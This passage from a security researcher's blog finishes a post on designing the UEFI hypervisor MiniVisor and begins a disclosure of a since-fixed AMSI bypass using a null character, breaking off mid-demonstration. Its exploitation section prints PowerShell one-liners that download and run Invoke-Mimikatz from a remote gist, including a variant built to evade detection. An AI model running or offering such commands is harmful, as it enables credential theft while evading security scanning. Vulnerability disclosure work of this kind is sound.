transition because drivers that implement the API are unloaded. After this transition,
runtime drivers can only use the run-time services, which drastically reduces
the ability of the hypervisor to interact with the environment.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Physical Mode vs Virtual Mode</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Another transition that the runtime
drivers have to go through is the change of the memory address layout.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">At the boot time, the system is
in the long-mode, same as Windows. However, virtual to physical address mapping
is pure 1:1, that is, the virtual address 0xdf2000 is translated into the
physical address 0xdf2000. This mode is called physical mode.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Soon after the transition to run
time, a bootloader (winload.efi in the case of Windows) sets up and configures
new page tables to map runtime drivers to the addresses that work well with the
operating system (eg, the physical address 0xdf2000 may be mapped to
0xfffff803`1ce40000). Then, the bootloader calls the SetVirtualAddressMap run-time
service letting runtime drivers perform their preparation, switches to the new
page table and discards the old page table. After this point, the runtime
drivers are mapped to only the new address, just like regular Windows drivers.
This mode is called virtual mode. This transition can be catastrophic if the
hypervisor depends on the physical mode page tables. We will review how it can
be a problem.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Application Processor Start-Up</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Another unique event that the
UEFI hypervisor has to handle is processor initialization. Processors that are
not selected as a bootstrap processor (BSP; the processor initialized first)
are called application processors (APs) and are initialized after transitioning
to the virtual mode. This is done by BSP signaling INIT and Startup-IPI (SIPI).
When SIPI is signaled, APs start its execution on the real-mode and go through
mode transition up to the long-mode (in the case of the 64bit operating
systems). This requires some extra VM-exit handling that was not relevant for
the blue pull style hypervisors.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Those unique aspects of the
UEFI environment pose technical challenges and require different hypervisor
design considerations.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h2 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Challenges, Solutions, and
Considerations</span></h2>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Host CR3</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">As mentioned, the host CR3
becomes invalid if the value at the time of driver load is used because that
would be physical mode page tables that get destroyed. The most straightforward
solution for this is to set up our own page tables with the same translation as
the existing one (ie, physical mode page tables) and use them for the host.
This may sound complicated but is implemented with just 50 lines of C code in
MiniVisor.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">However, this results in having
different address translations once the guest switches to the virtual mode and
makes it significantly difficult for the host to interact with the guest. For
example, host code cannot be debugged with tools like Windbg anymore because
none of Windows code is mapped in a usable form while the host is running. If the hypervisor is going to need complex interaction with the guest virtual address, other approaches might make it simpler at the end. In a private build, I implemented a guest shell-code that runs in the same address space as the NT system process for interaction with the guest.</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAoHa7rrdXh33RYva_FxzyMnm1VwpOBaKiKDciAVnjJ8g7rSw5GSlNSAyqHSCISeSZKyQWCc_WjLHkPrlwhAfYZdAV5gpe44R2opRQv8ILAI9UnDCcnyU8m_Vdvfi4rZ7B_dnNVHaZzIo/s1600/Annotation+2020-03-08+200010.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="808" data-original-width="1600" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAoHa7rrdXh33RYva_FxzyMnm1VwpOBaKiKDciAVnjJ8g7rSw5GSlNSAyqHSCISeSZKyQWCc_WjLHkPrlwhAfYZdAV5gpe44R2opRQv8ILAI9UnDCcnyU8m_Vdvfi4rZ7B_dnNVHaZzIo/s400/Annotation+2020-03-08+200010.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Injecting the guest agent that hooks Windows kernel API</td></tr>
</tbody></table>
</div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">It also makes it harder to access
the guest virtual memory from the host for the same reason without implementing
the guest-virtual-to-host-virtual mapping mechanism. MiniVisor implements this
in MemoryAccess.c. This is essentially what every single hypervisor implements. <o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Host IDT</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">For the same reason as the host
CR3 is discarded, the host IDT becomes invalid if the value at the time of
driver load is used. Although this does not cause an issue immediately because
interrupt is disabled during execution of the host, any programming error
causing exception will cause triple fault without running any diagnostics code.
The solution is to create its own IDT for the host.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Having its own IDT, however,
means NMI can no longer be delivered to the Windows kernel if that occurs
during the execution of the host (reminder: NMI still occurs even if interrupts
are disabled). MiniVisor discards NMI for simplicity but you should consider reinjecting
it into the guest instead.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Host GDT</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">You may wonder about the GDT.
Yes, the GDT also needs to be created, but also requires modification because
firmware does not set up the task state segment that is required for VMX.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Logging</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Console output API is the boot-time
service that cannot be used after the transition to run time. Hence,
console-based logging must be ceased after that point. This could be addressed
in several ways, such as hooking into operating system logging API, but the
simplest solution is to use serial output instead of console output. This has
its limitations but requires almost zero extra code.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Another sensible option is to
have ring buffer to store log entries, and later, let a client application to
pull and print them out.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Testing Application Processors
Startup</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">This requires the hypervisor to
handle VM-exits as well as proper emulation of paging mode transitions that are
not relevant for the blue pull-style hypervisors. Specifically, handling of
INIT, SIPI and CR0.PG access are required.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">For me, this was one of the most
challenging parts of writing a hypervisor that supports booting an operating
system, mostly due to lack of available virtualization solutions as a test
environment and difference between them and the bare-metal environment (eg,
TLB, MSR etc), requiring through testing with bare-metal.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">My recommendation is to buy and
set up a single-board computer with a serial port so you can at least do
printf-debugging (or even better, Direct Connect Interface support). I might blog
about selecting devices and setting them up.<o:p></o:p></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0VCq-uSQ2QcunCW213Lpa7pSIl_INPa9h2BLBP0AlEZ-qxYYGSYgZ50oxoZtGhw2G5ibsicQEGetrZcLJSbWYmtQmQk6lzfxWZG-CBJ-e6KKnYmw-Sym8uaum7mIORg0PcLXXK-F_Lws/s1600/IMG_6272.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1200" data-original-width="1600" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0VCq-uSQ2QcunCW213Lpa7pSIl_INPa9h2BLBP0AlEZ-qxYYGSYgZ50oxoZtGhw2G5ibsicQEGetrZcLJSbWYmtQmQk6lzfxWZG-CBJ-e6KKnYmw-Sym8uaum7mIORg0PcLXXK-F_Lws/s400/IMG_6272.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Testing with a single-board computer</td></tr>
</tbody></table>
<h3>
<span style="font-size: 13.5pt;">Driver vs Standalone File</span></h3>
<div>
<span style="font-family: inherit;"><span style="font-size: 18px;">Compiling the hypervisor as a runtime driver works as demonstrated in the project. However, the more common approach is to build the hypervisor as a separate file and a UEFI application loads it into memory and starts executing it. </span></span><span style="font-size: 18px;">That is how VMware hypervisor as well as Hyper-V is implemented, as examples. </span><span style="font-family: inherit; font-size: 18px;">The standalone hypervisor format is often ELF because of </span><span style="font-family: inherit; font-size: 18px;">wider cross-platform compiler and debugging tool support. </span></div>
<div>
<span style="font-family: inherit; font-size: 18px;"><br /></span></div>
<div>
<span style="font-family: inherit;"><span style="font-size: 18px;">This approach has an advantage that the hypervisor code remains platform agnostic and re-usable; for example, one can write a small Windows driver as a hypervisor loader without mixing up platform dependent loader code and hypervisor code that should be platform independent. Then, the hypervisor module can remain portable.</span><span style="font-size: 18px;"><br /></span></span><br />
<span style="font-family: inherit;"><span style="font-size: 18px;"><br /></span><span style="font-size: 18px;">MiniVisor did not take this approach just because of lack of structure started from experimentation. I plan to restructure the project in this way. </span></span><br />
<span style="font-size: 18px;"><br /></span></div>
<h2>
<span style="font-size: 13.5pt;">Conclusion</span></h2>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">We reviewed some uniqueness of
the UEFI environment and how those impact design and implementation of
hypervisors compared with those designed under the blue-pill model. We also
looked at how MiniVisor was designed to work with those new factors and implied
limitations.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">While this short blog post may
not be sufficient for some readers to have clear ideas of those challenges and explained
solutions, I hope this post gives you some pointers to study the codebase of
MiniVisor and help make sense of why things are written in different ways than
the blue pill-style Windows hypervisor.</span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br />
<h3>
Further Learning</h3>
</div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">As a final note, if you are
particularly curious about tooling hypervisor for research and/or just having a
solid understanding of the underneath technologies and concepts, Bruce Dang and
I plan to offer a 5 days class this October. This will let you write your
hypervisor for both Windows and UEFI environments, develop "something
useful" and
play with them on physical and virtual machines to internalize technical details. </span><br />
<span style="color: black; font-size: 13.5pt;"><br /></span>
<span style="color: black; font-size: 13.5pt;">Please sign up from this page or contact
us if you are interested in.<br /><a href="https://gracefulbits.regfox.com/hypervisor-development-for-security-analysis">https://gracefulbits.regfox.com/hypervisor-development-for-security-analysis</a></span></div>
Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com5tag:blogger.com,1999:blog-2937860723034111347.post-91404873575811813822018-02-16T15:21:00.001-08:002018-02-16T19:05:48.358-08:00AMSI Bypass With a Null CharacterIn this blog post, I am going to look into a flaw I reported a few months ago and see how the flaw could have been exploited to execute malicious PowerShell scripts and commands while bypassing AMSI based detection. This issue <a href="https://portal.msrc.microsoft.com/en-us/security-guidance/acknowledgments" target="_blank">has been fixed</a> as defense-in-depth with the February Update.<br />
<div>
<br /></div>
<h2>
What is AMSI</h2>
<div>
AMSI, Anti-malware Scan Interface, is a mechanism Windows 10+ provides security software vendors for developing software that subscribes certain events and detects malicious contents. AMSI issues several types of events, but the most commonly used one by the software vendors is arguably the events about execution of scripts, where software can receive contents of those scripts and commands about to be executed (I will refer to them as contents simply), then scan and block them. </div>
<div>
<br /></div>
<div>
The below illustration is an overview of how this event is generated and notified to security software for scanning.</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigjb2QUEWIr6q-fmn-0b2xOe843MZEw5wWz-AG9jt0RDuvN9QvZoB7BAgJ_EMdz35DpEnhi7xAV4iyEBUEOxvPAdFOCydNvlbZKPFAacjtZ51RvrZTIZ2_8ueStXBNOFGAzj7wLrnn2Fo/s1600/aa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="298" data-original-width="1410" height="134" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigjb2QUEWIr6q-fmn-0b2xOe843MZEw5wWz-AG9jt0RDuvN9QvZoB7BAgJ_EMdz35DpEnhi7xAV4iyEBUEOxvPAdFOCydNvlbZKPFAacjtZ51RvrZTIZ2_8ueStXBNOFGAzj7wLrnn2Fo/s640/aa.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<br /></div>
<div>
The red boxes are security software that subscribes the events from AMSI and are called AMSI providers. When supported script engines such as PowerShell (i.e., System.Management.Automation.dll) and Windows Script Host (e.g., JScript.dll) execute contents, they call one of the functions exported from amsi.dll with the contents to scan with AMSI providers. </div>
<div>
<br /></div>
<div>
As illustrated above, AMSI providers rely on script engines to call the exported function and forward contents properly through amsi.dll; or, they would not receive contents and detect malicious strings.</div>
<div>
<br /></div>
<h2>
The Bug</h2>
<div>
The bug fixed was System.Management.Automation.dll did not take account of that PowerShell contents could include null characters in them and called AmsiScanString, which treated a null character as the end of contents, to forward contents to AMSI providers. Here is the prototype of the API.</div>
<div>
----</div>
<div>
<pre class="" style="overflow: auto; padding: 5px; white-space: pre-wrap; word-break: break-word; word-wrap: break-word;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">HRESULT WINAPI AmsiScanString(
_In_ HAMSICONTEXT amsiContext,
_In_ LPCWSTR string, <span style="white-space: normal;"><span style="color: #6aa84f;">// Will be terminated at the first null character</span></span>
_In_ LPCWSTR contentName,
_In_opt_ HAMSISESSION session,
_Out_ AMSI_RESULT *result
);</span></pre>
</div>
<div>
----</div>
<div>
<br /></div>
<div>
Because of this bug, amsi.dll could truncate contents (value of "string" above) at the first null character and then send to AMSI providers. This results in that AMSI providers not being able to scan all of the contents and detect malicious strings.</div>
<div>
<br /></div>
<h2>
Exploitation</h2>
<div>
The basic idea for exploitation is to place a null character into PowerShell contents before malicious strings appear.</div>
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhBsfBsIn5d6kLsVle5tpkJXNd6GLHxtxbicE1YYV4vec4QvlGRpUcaQLUdLoF1cu9Dj8TT_-IvaN8JCHetSAKaGlSqDXbCYmz60W9G85NUUkqG5XVYVgyYPpGe25uSBw47rCu7wjMnE8/s1600/bb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="248" data-original-width="1412" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhBsfBsIn5d6kLsVle5tpkJXNd6GLHxtxbicE1YYV4vec4QvlGRpUcaQLUdLoF1cu9Dj8TT_-IvaN8JCHetSAKaGlSqDXbCYmz60W9G85NUUkqG5XVYVgyYPpGe25uSBw47rCu7wjMnE8/s640/bb.png" width="640" /></a></div>
<h3>
</h3>
<h3>
</h3>
<h3>
File Based Exploitation</h3>
<div>
As a basic exploitation scenario, let us assume we are trying to execute Invoke-Mimikatz like this and being detected.</div>
<div>
----</div>
<div>
<span style="font-family: "verdana" , sans-serif; font-size: x-small;">> powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-<span style="color: red;">DefaultMimikatz</span>.ps1')"</span></div>
<div>
----</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEV-qfcRVxz7s7ycehmKL9GssfnlNK2b-6fWjKmkkbBDNKthEy_quD-9uBqn5vW8TWseDuWU5mvV7AQRarXc1zEN1ApM3au1Muy0EqVnBODBkgc9eufNJCOHMANtBbUOyRWikrYBCNfWY/s1600/detected.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="764" data-original-width="1600" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEV-qfcRVxz7s7ycehmKL9GssfnlNK2b-6fWjKmkkbBDNKthEy_quD-9uBqn5vW8TWseDuWU5mvV7AQRarXc1zEN1ApM3au1Muy0EqVnBODBkgc9eufNJCOHMANtBbUOyRWikrYBCNfWY/s640/detected.png" width="640" /></a></div>
<br />
This is because the contents being Invoke-Expression'd are visible to AMSI providers as shown in the below screenshot.</div>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="701" data-original-width="1600" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2yJoiu0q-hjY3JLk0Y0XrVqMFA1DGy_JHBrPGrKQoPkVgfcj-33qT1h3FJvdksBbYpEcKk0QRmEhCB_uEdYQ9fDRUD_MQHSTaNHvGKhYRhzyAsZM0b_Z9OGWj8GGYpndujC5QiU0bGbo/s640/visible.png" width="640" /></div>
<div>
<br /></div>
<div>
Such detection can be bypassed by placing a null character at the beginning of the file being Invoke-Expression'd.</div>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="325" data-original-width="1548" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSRZpNB9D2EuXYbFq4OCHWS72_-iIk_yRSsw95dx0uhXzHfGC4eFdMGXnAwZnH0hq8j4iRVx0Cr03OjT_cUDXolFt0U3A3mDedLhzP6wBI2x7Bi8XqPKRgClLJRHwN9RFrhhJc-ofcKzM/s640/diff.png" width="640" /></div>
<div>
<div>
<br /></div>
<div>
----</div>
<div>
<span style="font-family: "verdana" , sans-serif; font-size: x-small;">> powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-<span style="color: red;">BypassingMimikatz</span>.ps1')"</span></div>
<div>
----</div>
</div>
<div>
This successfully bypasses scan and detection by AMSI providers as seen below ("Get-ChildItem Function: | Select-String Invoke" is added for a demonstration purpose).<br />
<div class="separator" style="clear: both; text-align: center;">
